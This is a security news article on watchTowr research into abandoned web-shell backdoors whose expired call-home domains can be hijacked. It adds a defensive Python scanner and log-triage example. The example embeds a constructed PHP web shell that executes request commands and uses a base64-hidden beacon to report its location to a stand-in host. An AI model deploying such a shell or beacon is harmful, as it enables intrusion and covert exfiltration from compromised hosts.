In recent research, the watchTowr Labs team found more than 4,000 unique backdoors whose call-home infrastructure depends on expired domains and abandoned hosting. Because anyone can re-register an expired domain, each of those backdoors can be hijacked by whoever buys the name, which exposes the government- and academia-owned hosts on which the backdoors are installed.
The research, which focused on web shells, found that many of these backdoors still try to reach domains their original operators let lapse; whoever registers such a domain inherits control of every backdoor that calls home to it. watchTowr CEO Benjamin Harris dubbed the approach “mass-hacking-on-autopilot”: the attacker exploits nothing new, but takes over footholds that someone else already established.
Harris explained, “Imagine you want to gain access to thousands of systems, but don’t feel like investing the effort to identify and compromise systems yourself – or getting your hands dirty. Instead, you commandeer abandoned backdoors in regularly used backdoors to effectively ‘steal the spoils’ of someone else’s work.”
Whoever controls an abandoned backdoor gets the access its original operator had: to pull data off the compromised host or to use it as a springboard for further attacks. Because the takeover costs no more than a domain registration, a host that was compromised years ago and then forgotten remains a live risk, and cleaning up old compromises matters as much as hardening systems that are still in active use.
The research also documented how common backdoored web shells are: variants of well-known shells such as c99shell, r57shell and China Chopper that, alongside the features the person deploying them expects, contain hidden code that reports the shell's location back to a domain chosen by the shell's author. Whoever controls that domain learns where the shells are installed and can use or take over those footholds; when the domain expires, that knowledge passes to whoever registers it next.
To measure the exposure, the researchers registered more than 40 of these expired domains and logged the requests that arrived. The callbacks revealed compromised hosts belonging to government bodies and educational institutions across multiple countries, among them systems at the Federal High Court of Nigeria, which shows how serious the exposure is.
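The two sides of the technique described above, as an added example that is not part of the original article or of watchTowr's tooling: a scanner that pulls hard-coded call-home hosts out of a PHP web-shell fragment (including one hidden behind base64, the usual way such beacons are tucked away), and a triage routine that parses access-log lines, as they might arrive at a re-registered domain, to recover which hosts are reporting in and bucket them by sector. The shell fragment, the log lines, every hostname and the beacon URL are constructed for illustration; the `.invalid` TLD is reserved and never resolves.

```python
"""Two checks around backdoored web shells (added example; not watchTowr's code).

1. scan_shell_source(): find hard-coded call-home hosts in PHP web-shell source,
   including hosts hidden behind base64.
2. triage_sinkhole_log(): given access-log lines from a domain you re-registered,
   recover which hosts are reporting in and count them by sector.

All sample data below is constructed for illustration.
"""
import base64
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Constructed beacon URL; the shell author's domain is hypothetical (.invalid TLD).
BEACON_URL = "http://shell-author-example.invalid/report.php"
BEACON_B64 = base64.b64encode(BEACON_URL.encode()).decode()

# Constructed PHP fragment imitating a backdoored web shell: the visible feature is
# command execution, the hidden part reports the shell's own location to a third party.
SAMPLE_SHELL = f'''<?php
if (isset($_REQUEST['cmd'])) {{ echo shell_exec($_REQUEST['cmd']); }}
$u = base64_decode('{BEACON_B64}');
@file_get_contents($u . '?h=' . urlencode($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']));
$fp = @fsockopen("update.second-example.invalid", 80, $errno, $errstr, 5);
?>'''

STRING_RE = re.compile(r"""(?:"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)')""")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
FSOCK_RE = re.compile(r"""fsockopen\s*\(\s*['"]([A-Za-z0-9.-]+)['"]""", re.I)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def _literals(src):
    """Yield the contents of every single- or double-quoted string in the source."""
    for m in STRING_RE.finditer(src):
        yield m.group(1) if m.group(1) is not None else m.group(2)


def _unwrap_base64(s):
    """Return the decoded text if `s` is a base64 blob of printable text, else None."""
    if not B64_RE.match(s) or len(s) % 4:
        return None
    try:
        out = base64.b64decode(s, validate=True).decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return None
    return out if out.isprintable() else None


def scan_shell_source(src):
    """Hosts the shell contacts on its own, i.e. candidate call-home domains."""
    hosts = {h.lower() for h in FSOCK_RE.findall(src)}
    for lit in _literals(src):
        decoded = _unwrap_base64(lit)
        for text in (lit, decoded or ""):
            hosts.update(h.lower() for h in URL_RE.findall(text))
    return sorted(hosts)


# Constructed access-log lines (Apache combined format) as they might arrive at a
# re-registered domain pointed at a listener. Client IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [08/Jan/2025:10:15:32 +0000] "GET /report.php?h=portal.example-ministry.gov.ng%2Fuploads%2Fc99.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.9 - - [08/Jan/2025:10:16:01 +0000] "GET /report.php?h=www.example-university.edu%2Fimages%2Fr57.php HTTP/1.1" 200 0 "-" "PHP/5.6"
203.0.113.4 - - [08/Jan/2025:10:16:40 +0000] "GET /favicon.ico HTTP/1.1" 404 0 "-" "curl/8.0"
203.0.113.5 - - [08/Jan/2025:10:17:12 +0000] "GET /report.php?h=shop.example.com%2Fwp-content%2Fshell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def sector(host):
    """Coarse owner classification from the hostname's labels."""
    labels = host.lower().split(".")
    if "gov" in labels or "mil" in labels:
        return "government"
    if "edu" in labels or "ac" in labels:
        return "education"
    return "other"


def triage_sinkhole_log(log_text, report_path="/report.php", param="h"):
    """Recover (reporting host, shell path, source IP) triples and count them by sector."""
    victims = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlparse(m.group("target"))
        if target.path != report_path:
            continue  # noise such as favicon or scanner traffic
        for value in parse_qs(target.query).get(param, []):  # parse_qs already percent-decodes
            host, _, path = value.partition("/")
            victims.append((host, "/" + path, m.group("ip")))
    return victims, dict(Counter(sector(v[0]) for v in victims))


if __name__ == "__main__":
    print("call-home hosts:", scan_shell_source(SAMPLE_SHELL))
    victims, counts = triage_sinkhole_log(SAMPLE_LOG)
    for host, path, src_ip in victims:
        print(f"{sector(host):<10} {host}{path} (reported from {src_ip})")
    print(counts)
```

Without the base64 step the scanner would only see the `fsockopen` host; the beacon that matters is the one the author bothered to hide. On the log side, the reporting host comes from the query parameter the shell sends, not from the client IP, since the IP is merely the server the shell runs on and may sit behind NAT or a proxy.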
To stop anyone else from taking over the same backdoors, watchTowr transferred the domains to the Shadowserver Foundation for sinkholing: the callbacks now land on infrastructure that only records them and cannot be used to command the backdoors, which keeps the affected hosts from being exploited through this route again.
Harris described the research as a mix of “morbid curiosity” and nostalgia for an older era of the cybersecurity landscape. Even so, the compromised systems the team observed are a reminder that old, forgotten intrusions remain a present-day threat to organizations and individuals.
The broader lesson is that vigilance cannot stop at patching new vulnerabilities: compromises that were never cleaned up, and infrastructure that was simply abandoned, stay exploitable, and proactive measures, including hunting for old web shells and retiring or sinkholing dead infrastructure, are what close that gap.